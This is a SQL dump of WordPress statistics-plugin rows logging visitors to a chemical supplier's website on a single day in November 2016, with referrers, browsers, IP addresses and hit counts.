INSERT INTO `wp_statistics_visitor` VALUES (14740, '2016-11-02', 'https://www.bing.com/search?q=azo%20compounds%20free%20radical%20initiators&pivot=web&mkt=en-ZW&setlang=en-GB&input=1', 'IEMobile', 'Windows Phone', '11.0', '', '106.198.210.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14741, '2016-11-02', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '32.0', '', '165.231.96.122', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14742, '2016-11-02', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '165.231.96.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14743, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14744, '2016-11-02', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '142.244.193.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14745, '2016-11-02', 'https://www.google.com.tw/', 'Chrome', 'Windows', '54.0.2840.71', '', '61.220.232.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14746, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '54.161.32.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14747, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '128.163.239.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14748, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.45.193.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14749, '2016-11-02', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14750, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '53.0.2785.116', '', '54.146.213.247', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14751, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '119.195.170.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14752, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.92.216.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14753, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '202.154.190.182', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14754, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '220.181.51.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14755, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14756, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '171.25.193.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14757, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '93.115.95.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14758, '2016-11-02', 'https://www.google.co.uk/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '86.147.252.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14759, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14760, '2016-11-02', 'https://mmr.mschem.com/miller/pdf/MS-795,%20797.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '194.100.61.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14761, '2016-11-02', 'https://pokerniydom.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.86.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14762, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.15.238.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14763, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '29.0', '', '23.27.237.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14764, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '29.0', '', '23.27.239.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14765, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14766, '2016-11-02', 'https://www.electroyou.it/forum/viewtopic.php?f=1&t=42874&start=60', 'Chrome', 'Windows', '54.0.2840.71', '', '31.27.246.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14767, '2016-11-02', 'https://www.miller-stephenson.com/chemicals/mold-release-agents/', 'Safari', 'iPhone', '7.0', '', '199.30.24.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14768, '2016-11-02', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwjsvuGK0InQAhWKfrwKHbwCAQMQFghcMAg&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&bvm=bv.137132246,d.dGc', 'MSIE', 'Windows', '11.0', '', '10.5.147.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14769, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14770, '2016-11-02', 'https://video-chat.cn/', 'Opera', 'Windows', '7.02', '', '178.137.95.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14771, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '161.69.31.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14772, '2016-11-02', 'https://www.google.com.tw/', 'Chrome', 'Windows', '49.0.2623.112', '', '118.163.112.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14773, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '163.172.221.63', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14774, '2016-11-02', 'https://www.google.fr/', 'Chrome', 'Windows', '54.0.2840.71', '', '178.23.39.193', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14775, '2016-11-02', 'https://mydirtystuff.com/', 'Opera', 'Windows', '7.54', '', '178.137.86.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14776, '2016-11-02', 'https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent', 'MSIE', 'Windows', '9.0', '', '182.118.21.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14777, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14778, '2016-11-02', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwj31_7a24nQAhXCS7wKHTx-A_IQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2F157-fsh%2F&usg=AFQjCNG6907cmmzzDl-JT3Pe2PXGLVrQgg&bvm=bv.137132246,d.dGc', 'MSIE', 'Windows', '11.0', '', '1.212.90.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14779, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14780, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.162.75.225', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14781, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.84.79.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14782, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.148.171.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14783, '2016-11-02', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '1.2.3', '', '54.183.129.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14784, '2016-11-02', 'https://cpabegins.ru/', 'Opera', 'Windows', '8.01', '', '46.119.118.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14785, '2016-11-02', 'https://www.google.ro/', 'Firefox', 'Windows', '49.0', '', '5.2.192.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14786, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '141.119.184.10', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14787, '2016-11-02', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '86.147.198.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14788, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '220.181.51.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14789, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.117.248.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14790, '2016-11-02', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwjUj7ut6onQAhXqKMAKHRIEDroQFghoMAg&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '212.159.104.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14791, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.6.34.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14792, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '89.29.171.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14793, '2016-11-02', 'https://www.google.at/', 'Chrome', 'Windows', '54.0.2840.71', '', '80.110.83.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14794, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiG3_317InQAhWjrlQKHf4mDZcQFgguMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fmold-release-agents%2F&usg=AFQjCNHhgyC2pnZej0928BNtU-741d08wg', 'MSIE', 'Windows', '11.0', '', '192.31.106.40', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14795, '2016-11-02', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '182.71.39.42', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14796, '2016-11-02', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '195.154.161.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14797, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '190.112.221.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14798, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '157.50.101.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14799, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.126', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14800, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14801, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '43.0.2357.134', '', '64.71.194.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14802, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14803, '2016-11-02', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiGydvv9onQAhXEjn4KHQhuBnYYABAJ&ei=psgZWJO_OYHnmQHYx7ToBQ&sig=AOD64_3dfTrTXiAqj_yHakX2hHMKY88xTA&rct=j&q=&sqi=2&ved=0ahUKEwiTqtXv9onQAhWBcyYKHdgjDV0Q0QwIpQE&adurl=', 'MSIE', 'Windows', '11.0', '', '173.188.246.118', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14804, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '79.25.60.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14805, '2016-11-02', 'https://www.bing.com/search?q=Miller-Stephenson+Chemical&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '217.108.170.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14806, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14807, '2016-11-02', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14808, '2016-11-02', 'https://www.google.com/', 'Safari', 'Macintosh', '8.0.5', '', '24.63.46.74', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14809, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.46.74', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14810, '2016-11-02', 'https://www.google.co.in/', 'Chrome', 'Windows', '43.0.2357.81', '', '121.242.63.60', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14811, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '113.210.184.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14812, '2016-11-02', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiNyO_ugIrQAhUFW34KHcO8C3wYABAA&sig=AOD64_1YR5IOuWrm5wdE2q7aVZOQrHdW_g&rct=j&q=&ved=0ahUKEwjF7-rugIrQAhWa2YMKHZFABXgQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '12.175.12.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14813, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiZ6tqOgYrQAhVIMyYKHXEbB40QFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14814, '2016-11-02', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14815, '2016-11-02', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '138.162.0.41', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14816, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj8gY6pgYrQAhUILSYKHTKVDOIQFgg8MAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '192.249.47.211', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14817, '2016-11-02', 'https://www.miller-stephenson.com/', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14818, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '173.9.114.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14819, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '210.186.202.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14820, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '24.63.154.108', '000', 121, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14821, '2016-11-02', 'https://www.google.com.sg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiGt7-LhorQAhWFpY8KHeZlAFMQFggZMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-907-two-part-epoxy-adhesive%2F&usg=AFQjCNG-RsF8ufC-UmC2iZIs3mMktO4dqg&bvm=bv.137132246,d.c2I', 'MSIE', 'Windows', '11.0', '', '103.6.106.251', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14822, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '93.159.230.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14823, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '134.223.116.153', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14824, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '72.1.87.209', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14825, '2016-11-02', 'https://www.bing.com/search?q=Miller+Stephenson+Epoxy+907&FORM=QSRE1', 'MSIE', 'Windows', '11.0', '', '208.44.11.232', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14826, '2016-11-02', 'https://www.ask.com/web?q=Dy+Lubricant+MS+122+DX&qsrc=1&o=10181&l=dir&qo=serpSearchTopBox', 'MSIE', 'Windows', '11.0', '', '192.107.246.118', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14827, '2016-11-02', 'https://www.google.fr/', 'Firefox', 'Windows', '49.0', '', '193.253.193.119', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14828, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14829, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14830, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '63.225.182.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14831, '2016-11-02', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '104.160.30.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14832, '2016-11-02', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '184.175.244.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14833, '2016-11-02', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '184.175.244.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14834, '2016-11-02', 'https://www.google.co.uk/', 'Safari', 'Macintosh', '10.0', '', '81.134.147.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14835, '2016-11-02', 'https://life-instyle.com/', 'MSIE', 'Windows', '6.0', '', '176.8.88.141', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14836, '2016-11-02', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.0', '', '91.200.12.12', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14837, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '91.200.12.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14838, '2016-11-02', 'https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/', 'MSIE', 'Windows', '11.0', '', '192.35.35.40', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14839, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14840, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14841, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '204.237.176.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14842, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.31.106.40', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14843, '2016-11-02', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '54.0.2840.71', '', '50.151.36.144', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14844, '2016-11-02', 'https://www.miller-stephenson.com', 'AppleWebKit', 'iPhone', '601.1.46', '', '113.118.246.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14845, '2016-11-02', 'https://www.google.com.tw/', 'Chrome', 'Windows', '56.0.2905.0', '', '114.33.69.239', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14846, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '212.175.18.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14847, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '192.31.242.196', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14848, '2016-11-02', 'https://www.miller-stephenson.com/krytox/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.93.241.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14849, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '7.0', '', '70.209.140.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14850, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '52.8.102.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14851, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '172.78.54.42', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14852, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '205.185.54.82', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14853, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '152.13.249.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14854, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14855, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '144.160.98.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14856, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '10.8.5.171', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14857, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '185.26.106.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14858, '2016-11-02', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '129.55.200.20', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14859, '2016-11-02', 'https://www.google.ca/', 'Safari', 'Macintosh', '10.0', '', '192.161.115.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14860, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14861, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.87', '', '50.151.36.144', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14862, '2016-11-02', 'https://www.google.ca/', 'Safari', 'Macintosh', '9.1.3', '', '99.192.19.187', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14863, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '129.176.151.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14864, '2016-11-02', 'https://www.miller-stephenson.com/product/epon-828/', 'Chrome', 'Windows', '54.0.2840.71', '', '129.176.151.14', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14865, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '192.88.94.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14866, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '95.131.99.41', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14867, '2016-11-02', 'https://www.google.gr/', 'Chrome', 'Windows', '54.0.2840.71', '', '2.84.253.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14868, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14869, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14870, '2016-11-02', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/', 'Chrome', 'Windows', '54.0.2840.71', '', '129.176.151.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14871, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14872, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '199.107.68.203', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14873, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '195.169.99.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14874, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '97.77.39.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14875, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.87', '', '70.60.198.202', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14876, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '12.29.180.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14877, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjz5L37qYrQAhWG8CYKHYI5BvMQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '66.94.67.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14878, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14879, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.122', '000', 1, 0); 
